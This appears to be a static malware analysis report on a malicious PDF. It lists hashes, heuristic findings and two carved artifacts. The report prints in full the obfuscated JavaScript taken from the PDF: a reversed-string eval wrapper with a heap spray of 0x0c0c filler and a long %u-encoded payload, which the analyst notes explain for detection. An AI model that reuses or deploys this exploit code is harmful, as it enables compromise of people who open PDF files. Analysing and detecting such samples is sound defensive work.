Malicious PDF — malware analysis report

Static analysis result for SHA-256 1adb0eca0e1203d5…

MALICIOUS

PDF

66.6 KB First seen: 2026-05-08
MD5: 8e24345333803df3001b42c8703a04bd SHA-1: 0e091fce7f1ce249c1e7f7f38012b1f6881e3281 SHA-256: 1adb0eca0e1203d5df5a66b853304717f8e5a4ac848324d445886ccc4a063a17
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3764 bytes
SHA-256: 4e4e3762cd7d5534cfbecdb6acdce94b661dedd2bf8be3f0805462715f30b8e7
Detection
ClamAV: No threats found (no signature matched; the static findings below still apply)
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotations: comments only, the carved script itself is unchanged.
// `eva` is a Function whose body text has every space removed by
// split(" ").join(""), which leaves "eval(a);". Splitting the keyword keeps the
// literal token `eval` out of the file, so plain string matching on it does not fire.
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
// `s` stores the script's real statements as one string written back to front;
// nothing in it reads as code until the reversal on the last line.
// Read in reverse, the visible text:
//   - aliases `unescape` to a short name (the literal ends in "epacsenu"),
//   - passes a long run of space-separated "%u" + 4-hex-digit values through the
//     same split(" ").join("") step before decoding them,
//   - builds a filler string from "%u0c0c" pieces concatenated one character at a
//     time, then doubles it in while loops against 65536 and 0x80000 length limits,
//   - stores 0x1f0 copies (each with "s" appended) in a new Array.
// That structure is consistent with a heap spray carrying an encoded payload;
// the decoded bytes are not analysed in these notes.
// Detection note: `unescape`, `substring`, `new Array` and the "%u" escapes exist
// only after space-stripping and reversal, so rules have to normalise the text
// (or emulate the script) rather than match those tokens literally.
// NOTE(review): the literal is shown across two lines in this preview. A raw line
// break inside a quoted string is not valid JavaScript, so this is presumably a
// wrap added by the listing - confirm against the carved file.
       var s=' ;"s"+asLt=]vTeR[lHHrK )++vTeR;0f1x0<vTeR;0=vTeR( rof ;)(yarrA wen = lHHrK rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.pIaWD = asLt ;pIaWD =+ pIaWD )00008x0 < htgnel.pIaWD(elihw ;)2/63556 ,0(gnirtsbus.mCX = pIaWD ;twl =+ mCX ;Orgd =+ mCX ;)2/)42x0-c0c0x0( ,0(gnirtsbus.twl = mCX ;twl=+twl )63556 < 8 + 02 + htgnel.twl( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (lS = twl rav ;) )""(nioj.)" "(tilps."0614  u % 3113  u % f1d8  u % 3939  u % da6e  u % ffec  u % dc76  u % ffad  u % 9a0b  u % e6f2  u % 138b  u % 1276  u % 03db  u % 2d77  u % 1bd3  u % ba3f  u % b59f  u % 5a3c  u % 988b  u % d2a1  u % 0888  u % 2df4  u % 14ba  u % 58f4  u % ac42  u % cee7  u % 1c20  u % aec7  u % abb3  u % bede  u % 7dd2  u % ffa4  u % b9fb  u % e1ee  u % 877d  u % faec  u % 9d96  u % befa  u % df02  u % fab8  u % a21a  u % 2246  u % 1159  u % 390a  u % 6317  u % 6d3a  u % dbd7  u % 1f43  u % 45c7  u % 1728  u % 14ad  u % 5a60  u % 277a  u % 81df  u % 8745  u % 7e68  u % c325  u % ae77  u % 10d5  u % 2889  u % 8fa6  u % 2404  u % a0b6  u % 5237  u % 6302  u % 0e06  u % 5811  u % a462  u % dc9e  u % 1d82  u % 3c9b  u % 4229  u % 6a56  u % 418e  u % 06ee  u % 488c  u % 3caa  u % 517d  u % a0dd  u % ad58  u % dcfb  u % 7844  u % cec6  u % 2526  u % f0e6  u % 090e  u % f80a  u % f0cc  u % 9ad8  u % 6a66  u % c7a7  u % d220  u % 82e4  u % c986  u % a5a1  u % da45  u % c394  u % c964  u % 4bca  u % b551  u % b4c4  u % 3b85  u % 30e4  u % 3731  u % 4013  u % 383c  u % 1b33  u % 339c  u % abeb  u % d30a  u % b5eb  u % 424f  u % 9d47  u % ad0d  u % 0070  u % f211  u % 0070  u % 137d  u % 0070  u % d451  u % ff09  u % ffff  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % 0909  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 0909  u % ff09  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % ffff  u % 8e6e  u % 0070  
u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % be50  u % 57ee  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % c   0c   0  u % c   0c   0  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 18bf  u % 2c40  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4038  u % 380c  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 9881  u % b8a1  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 5185  u % a5be  u % 0070  u % bb51  u % 0070  u % 227a  u % 0070  u % d451  u % 4509  u % a509  u % 0070  u % bb51  u % 0070  u % 137d  u % 0000  u % 0400  u % 0000  u % 0001  u % 1000  u % 4010  u % 0000  u % 0000  u % 1000  u % 0010  u % ffff  u % ffff  u % 0070  u % 45c5  u % 0070  u % 2e25  u % 1000  u % 1100  u % 0070  u % 7f27  u % 0070  u % ca8a  u % 1000  u % 0010  u % 0070  u % bb51  u % 0070  u % ca8a  u % 1000  u % 1100  u % 0070  u % bb51  u % 0070  u % 2bf7  u % eff7  u % 0030  u % 0070  u % bb51  u % 0070  u % d451  u % 0000  u % 0001  u % 0070  u % bb51  u % 1000  u % 4010  u % 0070  u % 7f27  u % 1000  u % 4210  u % 0070  u % 9951  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % c   0c   0  u % c   0c   0  u % 0070  u % 4809  u % 0070  u % 3309  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % 0070  u % 4809  u % cccc  u % cccc  u % 0070  u % f651  u % 0070  u % fe84  u % cccc  u % cccc  u % 0070  u % 9194  u % c   0c   0  u % c   0c   0  u % " (lS = Orgd rav ;epacsenu = lS rav ';
// Reverses `s` character by character and passes the result to `eva`; this is the
// only point where the hidden statements run. For static review, applying the same
// reversal to the string without calling `eva` yields the readable statements.
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found (no signature matched; the static findings below still apply)
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)